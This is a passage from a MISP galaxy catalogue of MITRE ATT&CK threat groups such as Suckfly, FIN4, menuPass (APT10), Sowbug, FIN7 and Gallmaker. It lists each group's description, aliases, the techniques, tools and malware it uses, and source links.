uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1136.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Reg - S0075" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="China Chopper - S0020" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Ping - S0097" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="HTRAN - S0040" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="at - S0110" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Proxy - T1090.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="PlugX - S0013" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="ipconfig - S0100" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="cmd - S0106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Windows Credential Editor - S0005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="BlackMould - S0564" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="NBTscan - S0590" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Server - T1583.004" with estimative-language:likelihood-probability="almost-certain"

Table 4547. Table References
Links
https://attack.mitre.org/groups/G0093
https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers
https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/

Suckfly - G0039

[Suckfly](https://attack.mitre.org/groups/G0039) is a China-based threat group that has been active since at least 2014. (Citation: Symantec Suckfly March 2016)

The tag is: misp-galaxy:mitre-intrusion-set="Suckfly - G0039"

Suckfly - G0039 is also known as:

Suckfly

View relationships graph

Suckfly - G0039 has relationships with:

similar: misp-galaxy:threat-actor="Suckfly" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Nidiran - S0118" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"

Table 4548. Table References
Links
https://attack.mitre.org/groups/G0039
http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates
http://www.symantec.com/connect/blogs/indian-organizations-targeted-suckfly-attacks

FIN4 - G0085

[FIN4](https://attack.mitre.org/groups/G0085) is a financially-motivated threat group that has targeted confidential information related to the public financial market, particularly regarding healthcare and pharmaceutical companies, since at least 2013.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye FIN4 Stealing Insider NOV 2014) [FIN4](https://attack.mitre.org/groups/G0085) is unique in that they do not infect victims with typical persistent malware, but rather they focus on capturing credentials authorized to access email and other non-public correspondence.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)

The tag is: misp-galaxy:mitre-intrusion-set="FIN4 - G0085"

FIN4 - G0085 is also known as:

FIN4

View relationships graph

FIN4 - G0085 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="GUI Input Capture - T1056.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Email Hiding Rules - T1564.008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"

Table 4549. Table References
Links
https://attack.mitre.org/groups/G0085
https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.html
https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html
https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html

menuPass - G0045

[menuPass](https://attack.mitre.org/groups/G0045) is a threat group that has been active since at least 2006. Individual members of [menuPass](https://attack.mitre.org/groups/G0045) are known to have acted in association with the Chinese Ministry of State Security’s (MSS) Tianjin State Security Bureau and worked for the Huaying Haitai Science and Technology Development Company.(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)

[menuPass](https://attack.mitre.org/groups/G0045) has targeted healthcare, defense, aerospace, finance, maritime, biotechnology, energy, and government sectors globally, with an emphasis on Japanese organizations. In 2016 and 2017, the group is known to have targeted managed IT service providers (MSPs), manufacturing and mining companies, and a university.(Citation: Palo Alto menuPass Feb 2017)(Citation: Crowdstrike CrowdCast Oct 2013)(Citation: FireEye Poison Ivy)(Citation: PWC Cloud Hopper April 2017)(Citation: FireEye APT10 April 2017)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)

The tag is: misp-galaxy:mitre-intrusion-set="menuPass - G0045"

menuPass - G0045 is also known as:

menuPass
Cicada
POTASSIUM
Stone Panda
APT10
Red Apollo
CVNX
HOGFISH

View relationships graph

menuPass - G0045 has relationships with:

similar: misp-galaxy:threat-actor="Stone Panda" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Proxy - T1090.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PowerSploit - S0194" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Trusted Relationship - T1199" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="certutil - S0160" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="pwdump - S0006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="SNUGRIDE - S0159" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="UPPERCUT - S0275" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Ping - S0097" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="cmd - S0106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="PlugX - S0013" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Impacket - S0357" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="ChChes - S0144" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SSH - T1021.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="RedLeaves - S0153" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="EvilGrab - S0152" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="QuasarRAT - S0262" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="esentutl - S0404" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Data Staging - T1074.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="InstallUtil - T1218.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fast Flux DNS - T1568.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="AdFind - S0552" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Cobalt Strike - S0154" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="P8RAT - S0626" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Ecipekac - S0624" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clear Command History - T1070.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="FYAnti - S0628" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="SodaMaster - S0627" with estimative-language:likelihood-probability="almost-certain"

Table 4550. Table References
Links
https://attack.mitre.org/groups/G0045
https://www.justice.gov/opa/pr/two-chinese-hackers-associated-ministry-state-security-charged-global-computer-intrusion
https://www.justice.gov/opa/page/file/1122671/download
http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/
https://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem
https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf
https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage
https://www.accenture.com/t20180423T055005Z_w_/se-en/acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf[https://www.accenture.com/t20180423T055005Z_w/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf]
https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html

Sowbug - G0054

[Sowbug](https://attack.mitre.org/groups/G0054) is a threat group that has conducted targeted attacks against organizations in South America and Southeast Asia, particularly government entities, since at least 2015. (Citation: Symantec Sowbug Nov 2017)

The tag is: misp-galaxy:mitre-intrusion-set="Sowbug - G0054"

Sowbug - G0054 is also known as:

Sowbug

View relationships graph

Sowbug - G0054 has relationships with:

similar: misp-galaxy:threat-actor="Sowbug" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Starloader - S0188" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Felismus - S0171" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

Table 4551. Table References
Links
https://attack.mitre.org/groups/G0054
https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments

FIN7 - G0046

[FIN7](https://attack.mitre.org/groups/G0046) is a financially-motivated threat group that has been active since 2013 primarily targeting the U.S. retail, restaurant, and hospitality sectors, often using point-of-sale malware. A portion of [FIN7](https://attack.mitre.org/groups/G0046) was run out of a front company called Combi Security. Since 2020 [FIN7](https://attack.mitre.org/groups/G0046) shifted operations to a big game hunting (BGH) approach including use of [REvil](https://attack.mitre.org/software/S0496) ransomware and their own Ransomware as a Service (RaaS), Darkside. [FIN7](https://attack.mitre.org/groups/G0046) may be linked to the [Carbanak](https://attack.mitre.org/groups/G0008) Group, but there appears to be several groups using [Carbanak](https://attack.mitre.org/software/S0030) malware and are therefore tracked separately.(Citation: FireEye FIN7 March 2017)(Citation: FireEye FIN7 April 2017)(Citation: FireEye CARBANAK June 2017)(Citation: FireEye FIN7 Aug 2018)(Citation: CrowdStrike Carbon Spider August 2021)

The tag is: misp-galaxy:mitre-intrusion-set="FIN7 - G0046"

FIN7 - G0046 is also known as:

FIN7
GOLD NIAGARA
ITG14
Carbon Spider

View relationships graph

FIN7 - G0046 has relationships with:

similar: misp-galaxy:threat-actor="FIN7" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Shimming - T1546.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="POWERSOURCE - S0145" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Carbanak - S0030" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="HALFBAKED - S0151" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="TEXTMATE - S0146" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="User Activity Based Checks - T1497.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="SQLRat - S0390" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="RDFSNIFFER - S0416" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="BOOSTWRITE - S0415" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="GRIFFON - S0417" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Pillowmint - S0517" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malware - T1587.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="REvil - S0496" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="JSS Loader - S0648" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Cobalt Strike - S0154" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="CrackMapExec - S0488" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SSH - T1021.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PowerSploit - S0194" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="VNC - T1021.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="AdFind - S0552" with estimative-language:likelihood-probability="almost-certain"

Table 4552. Table References
Links
https://attack.mitre.org/groups/G0046
https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html
https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html
https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html
https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/
http://blog.morphisec.com/fin7-attacks-restaurant-industry
https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
https://www.secureworks.com/research/threat-profiles/gold-niagara
https://securityintelligence.com/posts/ransomware-2020-attack-trends-new-techniques-affecting-organizations-worldwide/

Gallmaker - G0084

[Gallmaker](https://attack.mitre.org/groups/G0084) is a cyberespionage group that has targeted victims in the Middle East and has been active since at least December 2017. The group has mainly targeted victims in the defense, military, and government sectors.(Citation: Symantec Gallmaker Oct 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Gallmaker - G0084"

Gallmaker - G0084 is also known as:

Gallmaker

View relationships graph

Gallmaker - G0084 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
